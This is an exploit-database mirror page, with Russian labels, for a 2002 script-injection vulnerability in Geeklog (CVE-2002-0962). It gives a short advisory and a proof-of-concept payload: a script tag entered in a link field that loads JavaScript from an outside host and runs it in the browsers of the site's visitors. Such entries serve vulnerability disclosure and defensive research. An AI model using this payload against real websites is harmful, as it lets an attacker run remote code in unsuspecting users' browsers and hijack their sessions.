- 34,644
 
- 0
 
- 18 Дек 2022
 
- EDB-ID
 - 21528
 
- Проверка EDB
 - 
	
		
			
- Пройдено
 
 
- Автор
 - AHMET SABRI ALPER
 
- Тип уязвимости
 - WEBAPPS
 
- Платформа
 - PHP
 
- CVE
 - cve-2002-0962
 
- Дата публикации
 - 2002-06-10
 
		Код:
	
	source: https://www.securityfocus.com/bid/4974/info
Geeklog does not sufficiently sanitize script code from form fields, making it prone to script injection attacks.
Attacker-supplied script code may potentially end up in webpages generated by Geeklog and will execute in the browser of a user who views such pages, in the security context of the website. 
Link input($url) :<scriptsrc="http://forum.olympos.org/f.js">Alper</script>
	- Источник
 - www.exploit-db.com